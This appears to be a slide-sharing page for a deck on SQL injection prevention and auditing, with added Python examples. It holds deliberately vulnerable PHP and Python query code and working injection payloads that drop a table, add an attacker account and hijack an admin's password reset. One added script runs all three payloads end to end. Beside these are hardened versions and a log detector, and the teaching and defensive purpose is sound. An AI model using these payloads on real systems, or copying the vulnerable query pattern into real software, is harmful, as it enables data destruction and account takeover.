Injection Attacks
Executing, Preventing, and Auditing
What is an Injection Attack?
  • Exploits weak application-level security around the “system” type ID
    (the account the application itself uses to reach the data source)

  • The exploit allows the client, a.k.a. the attacker, to “piggyback” code
    into a web page and have the “system” ID execute it for them

  • Can both execute commands and insert / update / delete data




Conversys Technologies PVT. Ltd.
What is the Danger?
  • Typically “system” IDs have “all access” rights to the database

  • When exploited, the attacker can do anything the “system” ID can

  • Requires no special equipment or advanced knowledge

Industry
  Joint study by the US Department of Commerce and Visa:
  ranked as one of the top 5 greatest data security vulnerabilities

  “SQL injection is a technique used to exploit Web-based applications by
  using client-supplied data in SQL queries. SQL injection attacks are caused
  primarily by applications that lack input validation checks. Recently,
  commercial shopping cart products have been the focus of attack by hackers
  who seek account information. PCI DSS Requirement 6.5 requires that
  Web-facing applications be developed in accordance with secure coding
  guidelines to guard against such attacks.”

Different Types of Code Injection

  • SQL Injection (most prevalent)
  • LDAP Injection
  • XML Injection
  • Others......

  * The flaw is not specific to the injected language; it lies in the web
    application that embeds it.

Structure of Web Based Systems

  • Application logic – typically built with a scripting language (php, jsp,
    asp): a lightweight tool that interfaces with the data source and
    controls the behavior of the program

  • Data source – typically a database, but could also be a flat file, XML
    file, or another application

  • The interface between the application and the data source is typically
    done with an embedded language. Embedding integrates one type of code
    into another (such as a php script executing SQL commands), and the
    injection happens at that seam.

How does it work?

  Review of client-server architecture:
  • You (the client) request a web page
  • The server responds with the page, which is displayed on the client computer
  • The client enters data
  • The server takes the data, runs a server-side script, queries the
    database, and returns the results

What really happens when you search?

  The server has a prewritten SQL query stored in a script:
  select item, picture from ItemDB where description = '$client_input';

  You input “american psycho 1st”

  The prewritten script is then executed by the “system” ID as:
  select item, picture from ItemDB where description = 'american psycho 1st';

  Please note: you just used the “system” ID to execute a query that YOU
  wrote. In practice, most “system” IDs have DBA-level access, and are only
  restricted by the logic built into the application itself.

Code Example
<?php
session_start();
header("Cache-control: private"); // IE 6 fix
error_reporting(E_ALL);
?>
<html>
<body bgcolor="white">
<?php
$email = $_SESSION['email'];              // user's e-mail address, taken from the session
$value = stripslashes($_POST['newdata']); // data entered by the user; stripslashes() removes any escaping backslashes
$fieldname = $_POST['type'];              // field name to update, taken straight from the request
if ($_SESSION['access_rights'] == 1)
{
    $db = mysql_connect("localhost", "system_id", "password"); // connects to the local DB as the "system" ID
    mysql_select_db("payroll", $db);                             // selects the database to query
    // Prewritten query: $fieldname and $value are pasted into the SQL text
    // unvalidated and unescaped, so the client controls part of the statement
    $query = "update data SET $fieldname='$value' WHERE email = '$email'";
    $result = mysql_query($query, $db);                           // executes the query
    echo "<META HTTP-EQUIV='Refresh' CONTENT='0; URL=return.php'>";
}
?>
</body>
</html>

How can we exploit this?
SQL query stored in the application:

         select item, picture from ItemDB where description = '$client_input'

To commit a SQL injection attack, enter into the web site form:

         x';drop table 'ItemDB

The query executed by the “system” ID will now be:

         select item, picture from ItemDB where description = 'x';drop table 'ItemDB'

The server just executed the stored query, and we just effectively destroyed the
entire “ItemDB” database!

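The search query above and the parameterised form a defender would replace it with, run side by side as an added example that is not part of the deck. The deck's PHP/MySQL search is modelled with Python's sqlite3 module on an in-memory database; the table rows and the function names (`open_item_db`, `search_unsafe`, `search_safe`, `table_exists`) are constructed for this example. It uses the deck's own input `x'; drop table 'ItemDB` and shows the defect as the defender sees it: string-building lets the client rewrite the SQL text, while a bound parameter keeps the text fixed and treats the same input as a literal to match.

```python
import sqlite3

# Constructed sample rows standing in for the deck's ItemDB table.
SAMPLE_ITEMS = [
    ("B000001", "psycho.jpg", "american psycho 1st"),
    ("B000002", "fight.jpg", "fight club 1st"),
]

# The deck's own injection input, verbatim.
PAYLOAD = "x'; drop table 'ItemDB"


def open_item_db():
    """Create an in-memory ItemDB holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table ItemDB (item text, picture text, description text)")
    conn.executemany("insert into ItemDB values (?, ?, ?)", SAMPLE_ITEMS)
    conn.commit()
    return conn


def build_unsafe_query(client_input):
    """The deck's pattern: client input pasted straight into the SQL text."""
    return f"select item, picture from ItemDB where description = '{client_input}'"


def search_unsafe(conn, client_input):
    """Run the string-built query. Returns (sql_text, rows, driver_error)."""
    sql = build_unsafe_query(client_input)
    try:
        return sql, conn.execute(sql).fetchall(), None
    except (sqlite3.ProgrammingError, sqlite3.Warning) as exc:
        # sqlite3 executes one statement per execute() and rejects the stacked
        # "drop table". That is a property of this driver, not a defence: the
        # client has already rewritten the SQL text, and drivers or APIs that
        # accept several statements would run the second one.
        return sql, [], str(exc)


def search_safe(conn, client_input):
    """Parameterised form: the SQL text is fixed; the input is bound as data."""
    sql = "select item, picture from ItemDB where description = ?"
    return conn.execute(sql, (client_input,)).fetchall()


def table_exists(conn, name):
    """True if a table of that name is still present in the database."""
    row = conn.execute(
        "select count(*) from sqlite_master where type = 'table' and name = ?",
        (name,),
    ).fetchone()
    return row[0] == 1


if __name__ == "__main__":
    db = open_item_db()
    print(search_safe(db, "american psycho 1st"))      # the normal search
    sql, rows, err = search_unsafe(db, PAYLOAD)
    print(sql)                                         # now two statements
    print("driver said:", err)
    print(search_safe(db, PAYLOAD))                    # []: payload treated as data
    print("ItemDB still present:", table_exists(db, "ItemDB"))
```

The string-built path produces a statement text containing `; drop table`, which is the whole problem: the client has changed the structure of the query. Whether the second statement then runs depends on the driver (sqlite3 happens to refuse it), so that cannot be relied on as a control. The parameterised form returns no rows for the payload and the table is untouched, independent of driver behaviour.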
Even More Fun…
  “Add A New User”

  Canned query: SELECT email, passwd, login_id, full_name FROM members WHERE
  email = '$user_input';
  SQL attack: x'; INSERT INTO members ('email', 'passwd', 'login_id', 'full_name')
  VALUES ('mike@pinch.com','mynewPW','pinch','Mike Pinch')
  System then executes: SELECT email, passwd, login_id, full_name FROM members
  WHERE email = 'x'; INSERT INTO members ('email', 'passwd', 'login_id', 'full_name')
  VALUES ('mike@pinch.com','mynewPW','pinch','Mike Pinch');

  I now have my very own account!

One More for Good Measure
  “Forgot my Password”

  Canned query: SELECT email, passwd, login_id, full_name FROM members WHERE
  email = '$UserInput';
  SQL attack: x'; UPDATE members SET email = 'pinch@CLIENTX.com' WHERE email =
  'sysadmin@CLIENTX.com
  System then executes: SELECT email, passwd, login_id, full_name FROM members
  WHERE email = 'x'; UPDATE members SET email = 'pinch@CLIENTX.com' WHERE
  email = 'sysadmin@CLIENTX.com
  Now just go to “forgot my password”, type pinch@CLIENTX.com, and the system
  will conveniently email me the system admin’s password!

Prevention

Error Message Masking
  (Slide shows two screenshots of an error page: a “Bad” example that
  reveals the real database error, and a “Good” example that does not.)

Error Masking
  • Blocks real error messages from being displayed to the client

  • Best practice
    All specific error messages are suppressed, either by replacing them
    with a generic error message or by blocking them altogether.

How are Attacks Prevented?
  Sanitize all input, including:
  •      Data collected in forms through browsers
  •      Data collected in URLs
  •      Data collected through cookies
  Further controls:
  •      White/Black List
  •      Mask Error Messages
  •      Continuous Monitoring
  •      New technique: SQL Firewalls

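The hardened counterpart of the deck's payroll update (the Code Example slide), applying the white-list and error-masking controls listed above, as an added example written for this page rather than the deck's own code. Python's sqlite3 stands in for PHP/MySQL; the `data` table layout, the allow-listed column names and the function names are assumptions. The column name cannot be bound as a query parameter, so it is checked against an allow-list (the deck's white list) before any SQL is built; the value and the e-mail are bound parameters; and any database error is masked with a generic message while the detail goes to the server log.

```python
import logging
import sqlite3

log = logging.getLogger("payroll")

# Allow-list (the deck's "white list"): the only columns the form may update.
# A column name cannot be bound as a query parameter, so the identifier is
# validated against this set before any SQL text is built. (Column names are
# assumptions for this example.)
UPDATABLE_FIELDS = {"phone", "address"}

# What the client sees on any failure; the real error goes to the server log only.
GENERIC_ERROR = "Your request could not be processed."


def open_payroll_db():
    """In-memory stand-in for the deck's payroll database, with constructed data."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table data (email text primary key, phone text, address text, salary integer)"
    )
    conn.execute(
        "insert into data values ('alice@example.com', '555-0100', '1 Main St', 50000)"
    )
    conn.commit()
    return conn


def read_row(conn, email):
    """Return (email, phone, address, salary) for one user, or None."""
    return conn.execute(
        "select email, phone, address, salary from data where email = ?", (email,)
    ).fetchone()


def update_field(conn, email, fieldname, value):
    """Hardened version of the deck's update. Returns (ok, message_for_client)."""
    if fieldname not in UPDATABLE_FIELDS:
        # Client-chosen identifier outside the allow-list (e.g. "salary", or a
        # fragment of SQL): refuse before building any query.
        log.warning("rejected update of field %r for %s", fieldname, email)
        return False, GENERIC_ERROR
    # Identifier comes from the allow-list; value and e-mail are bound parameters,
    # so quotes or semicolons in them are stored literally, never parsed as SQL.
    sql = f"update data set {fieldname} = ? where email = ?"
    try:
        cur = conn.execute(sql, (value, email))
        conn.commit()
    except sqlite3.Error as exc:
        # Error masking: full detail to the server log, generic text to the client.
        log.error("update of %s failed: %s", email, exc)
        return False, GENERIC_ERROR
    if cur.rowcount != 1:
        return False, GENERIC_ERROR
    return True, "Updated."


if __name__ == "__main__":
    db = open_payroll_db()
    print(update_field(db, "alice@example.com", "phone", "555-0199"))
    print(update_field(db, "alice@example.com", "salary", "999999"))        # rejected
    print(update_field(db, "alice@example.com", "address", "1 O'Neil St"))  # quote is data
    print(read_row(db, "alice@example.com"))
```

The three controls work together: the allow-list handles the one part of the statement that cannot be parameterised, binding handles the values, and the generic message keeps the database's own error text (table names, syntax detail) away from the client while the server log still records what was attempted.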
Prevalence of Attacks
  • Injection attacks are extremely powerful, almost always malicious, and
    nearly undetectable (until it's too late)
  • The danger comes from simplicity: no special hardware or software is
    necessary, just syntax knowledge and a browser!
  • In 2006, 14% of newly released commercial applications and open source
    tools were vulnerable to SQL injection attacks.
  • A recent study of web sites not masking error messages returned a total
    of 10.3%

Integrating into the Audit
  • Weak controls related to preventing injection attacks may affect the
    nature, timing and extent of financial statement substantive audit
    procedures.

  • Assistance may be needed from systems or data management professionals
    to help identify whether there were instances in which the control
    weaknesses were exploited.

  • Cobit Framework (see excerpt)
    – DS 5.3, Identity Management

  Cobit Framework – DS 5.3, Identity Management:
  “All users (internal, external and temporary) and their activity on IT
  systems (business application, system operation, development and
  maintenance) should be uniquely identifiable. User access rights to systems
  and data should be in line with defined and documented business needs and
  job requirements. User access rights are requested by user management,
  approved by system owner and implemented by the security-responsible
  person. User identities and access rights are maintained in a central
  repository. Cost-effective technical and procedural measures are deployed
  and kept current to establish user identification, implement
  authentication and enforce access rights.”

What Systems are Vulnerable?
  • Predominantly internally developed applications
  • Web based client-server architecture
  • Any system where access is available via the web

How do you determine if a system is vulnerable?
     •      Inquire
             – Do you have database and server error messages masked?
             – Do you have a strategy to sanitize all user input to detect SQL
               injection attacks?
             – Walk me through how your system prevents SQL injection attempts,
               i.e. filtering input, limiting rights.

     •      Observe
             – Ask the client to generate an error message
                  • It should either be generic or non-existent

     •      Inspect
             – Request a code sample showing the filtering module logic
                  • It should filter out suspicious characters such as “’,/;&%$” etc.
                  • View the white/black list

     •      Attack and Penetration Testing

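A check an auditor or operations team can run for the “Continuous Monitoring” control and the “Inspect” step above, as an added example that is not from the deck: it parses web-server access log lines, URL-decodes each query parameter, and flags values containing the quote and semicolon characters from the deck's suspicious-character list or the SQL keywords that appear in the deck's own attack strings. The log lines, the log format and the function names are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Apache/nginx "combined"-style, shortened);
# not taken from any real system.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2024:10:00:01 +0000] "GET /search.php?q=american+psycho+1st HTTP/1.1" 200 512
10.0.0.9 - - [01/Mar/2024:10:00:07 +0000] "GET /search.php?q=x%27%3Bdrop+table+%27ItemDB HTTP/1.1" 500 211
10.0.0.9 - - [01/Mar/2024:10:00:12 +0000] "GET /search.php?q=x%27%3B+UPDATE+members+SET+email HTTP/1.1" 200 300
10.0.0.7 - - [01/Mar/2024:10:00:20 +0000] "GET /item.php?id=42 HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Quote and semicolon from the deck's suspicious-character list, plus the SQL
# keywords that appear in the deck's own attack strings.
SUSPICIOUS = re.compile(r"['\";]|\b(?:drop|insert|update|delete)\b", re.IGNORECASE)


def parse_line(line):
    """Parse one log line into a dict with decoded query parameters, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    query = urlsplit(rec["target"]).query
    # parse_qsl undoes the URL encoding (%27 -> ', %3B -> ;, + -> space)
    rec["params"] = dict(parse_qsl(query, keep_blank_values=True))
    return rec


def suspicious_requests(log_text):
    """Return (ip, parameter, decoded value, status) for SQL-looking parameter values."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"].items():
            if SUSPICIOUS.search(value):
                hits.append((rec["ip"], name, value, rec["status"]))
    return hits


def server_errors(hits):
    """Flagged requests that ended in a 5xx: the input likely reached the database."""
    return [h for h in hits if h[3] >= 500]


if __name__ == "__main__":
    found = suspicious_requests(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print("with server errors:", server_errors(found))
```

A 5xx response to a flagged request is worth a look on its own: it suggests the input reached the database and that the resulting error was not masked. Keyword matching produces false positives (a legitimate search for the word “update”, say), so this is triage for review, not a blocking filter; prevention stays with parameterised queries and the white list.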
Created and Presented by Krishnendu Paul
  Vice President – Technologies
  Conversys Technologies Pvt. Ltd.
  A Maxelor Company

  References
  http://www.sarbanes-oxley.com/section.php?level=1&pub_id=Sarbanes-Oxley
  http://usa.visa.com/download/business/accepting_visa/ops_risk_management/Top_5_Vulnerabilities_Bulletin_August2006.pdf – 2006 Visa USA
  "Applying an improved economic model to software buy-versus-build decisions", Higaki, Wesley. Hewlett-Packard Journal, August 1995.
  "Cobit 4.0", IT Governance Institute, 2005
  Mitre Corporation, 2006

Thanks

  Conversys Technologies Pvt. Ltd.

  • Kolkata Office: 7, Bondel Road, Kolkata, West Bengal, India – 700019
    E-mail: info@conversys.in
    Telephone: +91-33-64602675

  • Pune Office: #204, Casa Grande, Lane No. 8, Koregaon Park, Pune - 411 001
    Telephone: +91 20 26052014

  • US Office: 15 Corporate Place, Suite# 333, Piscataway, NJ, 08854 USA

 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBX
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
Building AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxBuilding AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptx
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdf
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Website
 

Injection techniques conversys

Structure of Web Based Systems
  • Application logic – Typically built with a scripting language (php, jsp, asp), a lightweight tool that interfaces with the data source and controls the behavior of the program
  • Data Source – Typically a database, but could also be a flat file, XML file, or another application
  • The interface between the application and data source is typically done with an embedded language. Embedded systems integrate one type of code into another (such as a php script executing SQL commands)
How does it work? Review on Client-Server Architecture
  • You (client) request a web page
  • Server responds with the page, as displayed on the client computer
  • Client enters data
  • Server takes data, runs server side script, queries database, returns results
What really happens when you search?
  • Server has a prewritten SQL query stored in a script:
      select item, picture from ItemDB where description = '$client_input';
  • You input "american psycho 1st"
  • Prewritten script is then executed by "system" as:
      select item, picture from ItemDB where description = 'american psycho 1st';
  • Please Note: You just used the "system" ID to execute a query that YOU wrote. In practice, most "system" IDs have DBA level access, and are only restricted by the logic built into the application itself.
Code Example
  <?php
  session_start();
  header("Cache-control: private"); // IE 6 Fix.
  error_reporting(E_ALL);
  ?>
  <html>
  <body bgcolor = white>
  <?php
  $email = $_SESSION['email'];               // Variable holding user's email address (taken from the session)
  $value = stripslashes($_POST['newdata']);  // Variable holding data entered (stripslashes removes any escaping the runtime added)
  $fieldname = $_POST['type'];               // Variable holding fieldname to update (also client controlled)
  if ($_SESSION['access_rights'] == 1) {
      $db = mysql_connect("localhost", "system_id", "password");  // Connects to local DB as the "system" ID
      mysql_select_db("payroll", $db);                            // selects database to query
      $query = "update data SET $fieldname='$value' WHERE email = '$email'";  // Prewritten Query, assembled by string interpolation
      $result = mysql_query($query, $db);                         // executes query
      echo "<META HTTP-EQUIV='Refresh' CONTENT='0; URL=return.php'>";
  }
  ?>
  • Both $value and $fieldname reach the query exactly as the client sent them. $fieldname is an identifier, so even a prepared statement could not bind it as a parameter; it has to be checked against an allowlist of editable columns. (The mysql_* extension shown here was removed in PHP 7; current code uses mysqli or PDO, which both support bound parameters.)
How can we exploit this?
  • SQL Query Stored in Application:
      select item, picture from ItemDB where description = '$client_input'
  • To commit a SQL Injection Attack, enter into the web site form:
      x';drop table 'ItemDB
  • The query executed by the "System" ID will now be:
      select item, picture from ItemDB where description = 'x';drop table 'ItemDB'
  • The server just executed the stored query, and the second, injected statement dropped the whole "ItemDB" table!
  • Note: this relies on the database interface accepting stacked (multiple) statements in one call. PHP's mysql_query() does not; other drivers and databases do. The form shown also leaves the template's closing quote attached to the table name; the usual payload ends with a comment marker (--) so that the trailing quote is ignored.
Even More Fun… "Add A New User"
  • Canned Query:
      SELECT email, passwd, login_id, full_name FROM members WHERE email = '$user_input';
  • SQL Attack:
      x'; INSERT INTO members (email, passwd, login_id, full_name) VALUES ('mike@pinch.com','mynewPW','pinch','Mike Pinch')
  • System then Executes:
      SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; INSERT INTO members (email, passwd, login_id, full_name) VALUES ('mike@pinch.com','mynewPW','pinch','Mike Pinch');
  • I now have my very own account!
  • (As on the previous slide, the application's own closing quote follows the payload; a comment marker at the end of the input keeps it from breaking the INSERT.)
One More for Good Measure "Forgot my Password"
  • Canned Query:
      SELECT email, passwd, login_id, full_name FROM members WHERE email = '$UserInput';
  • SQL Attack:
      x'; UPDATE members SET email = 'pinch@CLIENTX.com' WHERE email = 'sysadmin@CLIENTX.com
  • System then Executes:
      SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; UPDATE members SET email = 'pinch@CLIENTX.com' WHERE email = 'sysadmin@CLIENTX.com';
  • Now just go to forgot my password, type pinch@CLIENTX.com, and the system will conveniently email me the system admin's password!
  • Here the attacker deliberately leaves the final quote off, so the application's own closing quote completes the UPDATE. The password itself is only recoverable this way if it is stored in clear text; with hashed passwords the same trick redirects the reset link instead, which still takes over the account.
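The three payloads from the drop-table, add-a-new-user and forgot-my-password slides, run end to end. This is an added example and not code from the Conversys slides: it models the slides' string-built queries in Python with sqlite3 rather than PHP with MySQL, uses a constructed ItemDB/members schema with one admin row, and calls executescript() to stand in for a database interface that accepts stacked statements. The first two payloads end with a comment marker (--) so the template's trailing quote is ignored; the third leaves its own final quote off, exactly as on the slide.

```python
import sqlite3

# Constructed sample schema mirroring the tables named on the slides (ItemDB, members).
SCHEMA = """
CREATE TABLE ItemDB (item TEXT, picture TEXT, description TEXT);
INSERT INTO ItemDB VALUES ('AP-1', 'ap1.jpg', 'american psycho 1st');
CREATE TABLE members (email TEXT, passwd TEXT, login_id TEXT, full_name TEXT);
INSERT INTO members VALUES ('sysadmin@CLIENTX.com', 'admin-secret', 'sysadmin', 'Site Admin');
"""


def fresh_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def search_items(db: sqlite3.Connection, client_input: str) -> str:
    """The search slide's pattern: client text is spliced straight into the SQL string.
    executescript() runs every statement in the string, which is the stacked-query
    behaviour the slides rely on (sqlite3's execute() refuses a second statement)."""
    sql = "SELECT item, picture FROM ItemDB WHERE description = '" + client_input + "';"
    db.executescript(sql)
    return sql


def lookup_member(db: sqlite3.Connection, user_input: str) -> str:
    """The 'canned query' behind the add-user and forgot-password slides."""
    sql = ("SELECT email, passwd, login_id, full_name FROM members WHERE email = '"
           + user_input + "';")
    db.executescript(sql)
    return sql


def table_exists(db: sqlite3.Connection, name: str) -> bool:
    row = db.execute("SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?",
                     (name,)).fetchone()
    return row is not None


def run_attacks() -> dict:
    db = fresh_db()
    results = {}

    # Drop-table slide. The slide's payload leaves the template's closing quote dangling;
    # "--" turns the rest of the line into a comment so the statement parses anywhere.
    search_items(db, "x'; DROP TABLE ItemDB; --")
    results["itemdb_dropped"] = not table_exists(db, "ItemDB")

    # Add-a-new-user slide: insert an attacker-controlled account (same "--" trick).
    lookup_member(db, "x'; INSERT INTO members (email, passwd, login_id, full_name) "
                      "VALUES ('mike@pinch.com', 'mynewPW', 'pinch', 'Mike Pinch'); --")
    results["attacker_login"] = db.execute(
        "SELECT login_id FROM members WHERE email = 'mike@pinch.com'").fetchone()[0]

    # Forgot-my-password slide: rebind the admin's e-mail. The attacker omits the final
    # quote on purpose and lets the application's own closing quote finish the UPDATE.
    lookup_member(db, "x'; UPDATE members SET email = 'pinch@CLIENTX.com' "
                      "WHERE email = 'sysadmin@CLIENTX.com")
    results["admin_passwd_now_mailed_to"] = db.execute(
        "SELECT email FROM members WHERE passwd = 'admin-secret'").fetchone()[0]
    return results


if __name__ == "__main__":
    print(run_attacks())
```

Each step checks its own effect through a separate, correctly parameterized query, so the dictionary returned by run_attacks() records exactly what the injected statements changed: the table is gone, a login_id of pinch exists, and the admin's password row now carries the attacker's address.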
Error Message Masking
  (Slide shows two screenshots, labelled Bad and Good.)
Error Masking
  • Blocks real error messages from being displayed to the client
  • Best Practice: All specific error messages are suppressed, either through using a generic error message, or blocking them altogether.
How are Attacks Prevented?
  • Sanitize all input including:
    – Data collected in Forms through browsers
    – Data collected in URL's
    – Data collected through cookies
  • White/Black List
  • Mask Error Messages
  • Continuous Monitoring
  • New Technique: SQL Firewalls
  • Use parameterized queries (prepared statements) so that client data is bound as a value and is never parsed as SQL; sanitization, lists and firewalls are then defence in depth rather than the only control.
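The update from the page's PHP code example, first built the vulnerable way and then with the controls listed above, as an added example written in Python with sqlite3 (it is not the page's code and stands in for PHP with MySQL). The column name is checked against an allowlist because identifiers cannot be bound as parameters, the values go in as ? placeholders, and the caller only ever sees a generic failure message. The payroll "data" table, its rows and the EDITABLE_FIELDS set are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the payroll "data" table updated by the PHP example.
SCHEMA = """
CREATE TABLE data (email TEXT PRIMARY KEY, phone TEXT, address TEXT, salary INTEGER);
INSERT INTO data VALUES ('alice@example.com', '555-0100', '1 Main St', 50000);
INSERT INTO data VALUES ('bob@example.com',   '555-0101', '2 Main St', 52000);
"""

# Fields a self-service user may edit (constructed). Identifiers cannot be bound as
# parameters, so the client-supplied column name is matched against this set instead.
EDITABLE_FIELDS = {"phone", "address"}


def fresh_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_update(db: sqlite3.Connection, email: str, fieldname: str, value: str) -> None:
    """String interpolation exactly as in the PHP slide; executescript() mimics a
    driver that accepts stacked statements."""
    sql = f"UPDATE data SET {fieldname}='{value}' WHERE email = '{email}'"
    db.executescript(sql)


def hardened_update(db: sqlite3.Connection, email: str, fieldname: str, value: str) -> str:
    """Allowlist the identifier, bind the values, and never echo the driver's error."""
    if fieldname not in EDITABLE_FIELDS:
        raise ValueError("field not editable")            # rejected before any SQL is built
    sql = f"UPDATE data SET {fieldname} = ? WHERE email = ?"  # only the vetted name is interpolated
    try:
        db.execute(sql, (value, email))                   # ? placeholders: value is data, never SQL
        db.commit()
        return "saved"
    except sqlite3.Error:
        return "update failed"                            # generic message for the client only


def table_exists(db: sqlite3.Connection, name: str) -> bool:
    row = db.execute("SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?",
                     (name,)).fetchone()
    return row is not None


def rejects_field(db: sqlite3.Connection, fieldname: str) -> bool:
    try:
        hardened_update(db, "alice@example.com", fieldname, "999999")
        return False
    except ValueError:
        return True


def compare() -> dict:
    payload = "x'; DROP TABLE data; --"   # the slides' drop-table payload, sent as the new value
    vuln = fresh_db()
    vulnerable_update(vuln, "alice@example.com", "phone", payload)

    hard = fresh_db()
    msg = hardened_update(hard, "alice@example.com", "phone", payload)
    stored = hard.execute("SELECT phone FROM data WHERE email = ?",
                          ("alice@example.com",)).fetchone()[0]
    return {
        "vulnerable_table_survives": table_exists(vuln, "data"),
        "hardened_table_survives": table_exists(hard, "data"),
        "hardened_stored_value": stored,                  # the payload is just text in the column
        "hardened_message": msg,
        "salary_edit_rejected": rejects_field(hard, "salary"),
        "injected_field_rejected": rejects_field(hard, "phone='x', salary=999999"),
    }


if __name__ == "__main__":
    print(compare())
```

The point of the allowlist is visible in the last two entries: a plain column the user should not touch and a column name that carries its own SET clause are both refused before the query string exists, which a character filter on $value alone would never catch.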
Prevalence of Attacks
  • Injection attacks are extremely powerful, almost always malicious, and nearly undetectable (until it's too late)
  • Danger comes from simplicity – no special hardware or software is necessary. Just syntax knowledge and a browser!
  • In 2006, 14% of newly released commercial applications and open source tools were vulnerable to SQL injection attacks.
  • A recent study found that 10.3% of the web sites surveyed were not masking error messages.
Integrating into the Audit
  • Weak controls related to preventing injection attacks may require changes to the nature, timing and extent of financial statement substantive audit procedures.
  • Assistance may be needed from systems or data management professionals to help identify if there were instances in which the control weaknesses were exploited.
  • Cobit Framework (see excerpt) – DS 5.3, Identity Management
    "All users (internal, external and temporary) and their activity on IT systems (business application, system operation, development and maintenance) should be uniquely identifiable. User access rights to systems and data should be in line with defined and documented business needs and job requirements. User access rights are requested by user management, approved by system owner and implemented by the security-responsible person. User identities and access rights are maintained in a central repository. Cost-effective technical and procedural measures are deployed and kept current to establish user identification, implement authentication and enforce access rights."
What Systems are Vulnerable?
  • Predominantly internally developed applications
  • Web based client-server architecture
  • Any system where access is available via the web
How do you determine if a system is vulnerable?
  • Inquire
    – Do you have database and server error messages masked?
    – Do you have a strategy to sanitize all user input to detect SQL injection attacks?
    – Walk me through how your system prevents SQL injection attempts, i.e. filtering input, limiting rights.
  • Observe
    – Ask client to generate an error message
    – Should either be generic or non-existent
  • Inspect
    – Request code sample showing filtering module logic
    – Should filter out suspicious characters such as ' , / ; & % $ etc.
    – View White/Black List
